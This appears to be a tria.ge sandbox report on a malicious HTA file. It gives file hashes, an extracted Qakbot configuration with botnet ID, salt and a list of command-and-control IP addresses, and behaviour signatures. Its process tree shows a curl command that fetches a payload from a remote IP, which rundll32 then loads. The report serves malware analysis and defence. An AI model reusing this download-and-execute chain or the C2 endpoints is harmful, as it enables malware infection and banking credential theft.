Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
03/02/2023, 18:04
230203-wnx46abh7w 703/02/2023, 18:03
230203-wnhz8sgd94 1003/02/2023, 14:58
230203-sb7w2sfg77 7Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
-
submitted
03/02/2023, 18:03
General
-
Target
DocumentsFolder_729396_Feb_03.one_2.hta
-
Size
5KB
-
MD5
9367d6f27ef13ffcc8c86ea9c28c3dbf
-
SHA1
4fe41d2d96f8ecddc2830c2a27aef22419c1509b
-
SHA256
4ed16497feaa7bbd98b485d057bf25cb3f24132c6a9f52d4c7b838e6a7f5f761
-
SHA512
09ae3e11d24a5485782a244ae4073b126757ba29a04f8f82ed6126f0a4e8f6bcb19b55229a9f23f190d48373669433fbf9e6af9fea6ae50895a2aea6a99e4c94
-
SSDEEP
96:IhVxy8VC+iNVCv38RGynB8xVpA8oVCynBu9cEAGfPE3rFSEnzAINLuClhkeXbZkh:1gPoWkJuClhkeqH
Malware Config
Extracted
qakbot
404.432
obama236
1675410243
79.9.64.37:995
174.104.184.149:443
24.64.112.40:3389
81.151.102.224:443
47.34.30.133:443
86.250.12.217:2222
50.68.204.71:993
156.217.208.137:995
181.118.206.65:995
103.212.19.254:995
83.114.60.6:2222
90.23.19.86:2222
66.131.25.6:443
12.172.173.82:465
86.195.14.72:2222
184.153.132.82:443
91.170.115.68:32100
72.80.7.6:995
71.31.101.183:443
198.2.51.242:993
-
salt
SoNuce]ugdiB3c[doMuce2s81*uXmcvP
Signatures
-
Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 17 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\DocumentsFolder_729396_Feb_03.one_2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\curl.exe"C:\Windows\System32\curl.exe" --output C:\ProgramData\aMqKd.png --url http://45.8.191.141/80567.dat2⤵
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\ProgramData\aMqKd.png,Wind2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wermgr.exeC:\Windows\SysWOW64\wermgr.exe3⤵
-
-
C:\Windows\SysWOW64\wermgr.exeC:\Windows\SysWOW64\wermgr.exe3⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im mshta.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD534b7dfe6ca2d3996915cb538df6f2876
SHA1aab8372031ca4c36ca41b70c7b36bc12d7de1f99
SHA256b4eb4929936981f3c05505c7a8ea6b506a21b2bff3d14ec9276f38996450b7a5
SHA5129d662dc7150eca82cdd56d6a17be4a7f1f6949ce7f4737797f271a2696ce569d471691ef78c30d50b42af372e3802d6c2f46ea3ca6f6a28a73ca7df98191dc73
-
Filesize
1.7MB
MD534b7dfe6ca2d3996915cb538df6f2876
SHA1aab8372031ca4c36ca41b70c7b36bc12d7de1f99
SHA256b4eb4929936981f3c05505c7a8ea6b506a21b2bff3d14ec9276f38996450b7a5
SHA5129d662dc7150eca82cdd56d6a17be4a7f1f6949ce7f4737797f271a2696ce569d471691ef78c30d50b42af372e3802d6c2f46ea3ca6f6a28a73ca7df98191dc73
-
Filesize
2.1MB
MD5f530495445432d6ae00f2b0f08f7c804
SHA1f66f538b95b1a924c8392fbe7743d193d78eb50c
SHA2565cc51f26704eef3b59e6d33ea690fa5c62237627269493ead5bad6f71d2de07b
SHA5122b44ed622e63014a0d2d613d8bbc1548dd193460ce7711414dc4eb62a2aef69d57c9821f834555539b6a49f584cb46c5e82a9867ab0a0733d78e4f1d032d6ce8
-
Filesize
2.1MB
MD5f530495445432d6ae00f2b0f08f7c804
SHA1f66f538b95b1a924c8392fbe7743d193d78eb50c
SHA2565cc51f26704eef3b59e6d33ea690fa5c62237627269493ead5bad6f71d2de07b
SHA5122b44ed622e63014a0d2d613d8bbc1548dd193460ce7711414dc4eb62a2aef69d57c9821f834555539b6a49f584cb46c5e82a9867ab0a0733d78e4f1d032d6ce8
-
Filesize
140KB
-
Filesize
140KB
-
Filesize
140KB
